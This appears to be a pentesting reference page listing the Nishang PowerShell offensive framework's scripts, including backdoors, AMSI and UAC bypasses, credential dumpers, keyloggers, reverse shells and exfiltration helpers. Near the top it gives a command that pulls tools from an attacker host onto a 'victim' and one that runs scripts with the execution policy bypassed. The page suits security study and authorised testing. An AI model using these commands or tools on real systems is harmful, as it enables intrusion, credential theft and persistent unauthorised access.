Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

Link: https://github.com/samratashok/nishang

Also installed by default on Kali:

root@kali:~# ls -l /usr/share/nishang/ 
total 48 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc 
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan 
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility 

We will need to upload the nishang scripts into the victim computer:

powershell iwr -uri 10.10.14.14/{Nishang script}

Load the script:

powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1

Scripts

Nishang currently contains the following scripts and payloads.

ActiveDirectory

• Get-Unconstrained – Find computers in active directory which have Kerberos Unconstrained Delegation enabled.

Antak – the Webshell

• Antak – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

Backdoors

• HTTP-Backdoor – A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.

• DNS_TXT_Pwnage – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.

• Execute-OnTime – A backdoor which can execute PowerShell scripts at a given time on a target.

• Gupt-Backdoor – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.

• Add-ScrnSaveBackdoor – A backdoor which can use Windows screen saver for remote command and script execution.

• Invoke-ADSBackdoor – A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

• Add-RegBackdoor – A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).

• Set-RemoteWMI – Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.

• Set-RemotePSRemoting – Modify permissions of PowerShell remoting to allow access to a non-admin user.

Bypass

• Invoke-AmsiBypass – Implementation of publicly known methods to bypass/avoid AMSI.

Client

• Out-CHM – Create infected CHM files which can execute PowerShell commands and scripts.

• Out-Word – Create Word files and infect existing ones to run PowerShell commands and scripts.

• Out-Excel – Create Excel files and infect existing ones to run PowerShell commands and scripts.

• Out-HTA – Create a HTA file which can be deployed on a web server and used in phishing campaigns.

• Out-Java – Create signed JAR files which can be used with applets for script and command execution.

• Out-Shortcut – Create shortcut files capable of executing PowerShell commands and scripts.

• Out-WebQuery – Create IQY files for phishing credentials and SMB hashes.

• Out-JS – Create JS files capable of executing PowerShell commands and scripts.

• Out-SCT – Create SCT files capable of executing PowerShell commands and scripts.

• Out-SCF – Create a SCF file which can be used for capturing NTLM hash challenges.

Escalation

• Enable-DuplicateToken – When SYSTEM privileges are required.

• Remove-Update – Introduce vulnerabilities by removing patches.

• Invoke-PsUACme – Bypass UAC.

Execution

• Download-Execute-PS – Download and execute a PowerShell script in memory.

• Download_Execute – Download an executable in text format, convert it to an executable, and execute.

• Execute-Command-MSSQL – Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.

• Execute-DNSTXT-Code – Execute shellcode in memory using DNS TXT queries.

• Out-RundllCommand – Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.

Gather

• Check-VM – Check for a virtual machine.

• Copy-VSS – Copy the SAM file using Volume Shadow Copy Service.

• Invoke-CredentialsPhish – Trick a user into giving credentials in plain text.

• FireBuster FireListener – A pair of scripts for egress testing

• Get-Information – Get juicy information from a target.

• Get-LSASecret – Get LSA Secret from a target.

• Get-PassHashes – Get password hashes from a target.

• Get-WLAN-Keys – Get WLAN keys in plain text from a target.

• Keylogger – Log keystrokes from a target.

• Invoke-MimikatzWdigestDowngrade – Dump user passwords in plain on Windows 8.1 and Server 2012

• Get-PassHints – Get password hints of Windows users from a target.

• Show-TargetScreen – Connect back and Stream target screen using MJPEG.

• Invoke-Mimikatz – Load mimikatz in memory. Updated and with some customisation.

• Invoke-Mimikittenz – Extract juicy information from target process (like browsers) memory using regex.

• Invoke-SSIDExfil – Exfiltrate information like user credentials, using WLAN SSID.

• Invoke-SessionGopher – Identify admin jump-boxes and/or computers used to access Unix machines.

MITM

• Invoke-Interceptor – A local HTTPS proxy for MITM attacks. =

Pivot

• Create-MultipleSessions – Check credentials on multiple computers and create PSSessions.

• Run-EXEonRemote  – Copy and execute an executable on multiple machines.

• Invoke-NetworkRelay  – Create network relays between computers.

Prasadhak

• Prasadhak – Check running hashes of running process against the VirusTotal database.

Scan

• Brute-Force – Brute force FTP, Active Directory, MSSQL, and Sharepoint.

• Port-Scan – A handy port scanner.

Powerpreter

• Powerpreter – All the functionality of nishang in a single script module.

Shells

• Invoke-PsGcat – Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent

• Invoke-PsGcatAgent – Execute commands and scripts sent by Invoke-PsGcat.

• Invoke-PowerShellTcp – An interactive PowerShell reverse connect or bind shell

• Invoke-PowerShellTcpOneLine – Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.

• Invoke-PowerShellTcpOneLineBind – Bind version of Invoke-PowerShellTcpOneLine.

• Invoke-PowerShellUdp – An interactive PowerShell reverse connect or bind shell over UDP

• Invoke-PowerShellUdpOneLine – Stripped down version of Invoke-PowerShellUdp.

• Invoke-PoshRatHttps – Reverse interactive PowerShell over HTTPS.

• Invoke-PoshRatHttp – Reverse interactive PowerShell over HTTP.

• Remove-PoshRat – Clean the system after using Invoke-PoshRatHttps

• Invoke-PowerShellWmi – Interactive PowerShell using WMI.

• Invoke-PowerShellIcmp – An interactive PowerShell reverse shell over ICMP.

• Invoke-JSRatRundll – An interactive PowerShell reverse shell over HTTP using rundll32.exe.

• Invoke-JSRatRegsvr – An interactive PowerShell reverse shell over HTTP using regsvr32.exe.

Utility

• Add-Exfiltration – Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.

• Add-Persistence – Add reboot persistence capability to a script.

• Remove-Persistence – Remote persistence added by the Add-Persistence script.

• Do-Exfiltration – Pipe (|) this to any script to exfiltrate the output.

• Download – Transfer a file to the target.

• Parse_Keys – Parse keys logged by the keylogger.

• Invoke-Encode – Encode and compress a script or string.

• Invoke-Decode – Decode and decompress a script or string from Invoke-Encode.

• Start-CaptureServer – Run a web server which logs Basic authentication and SMB hashes.

• ConvertTo-ROT13 – Encode a string to ROT13 or decode a ROT13 string.

• Out-DnsTxt – Generate DNS TXT records which could be used with other scripts.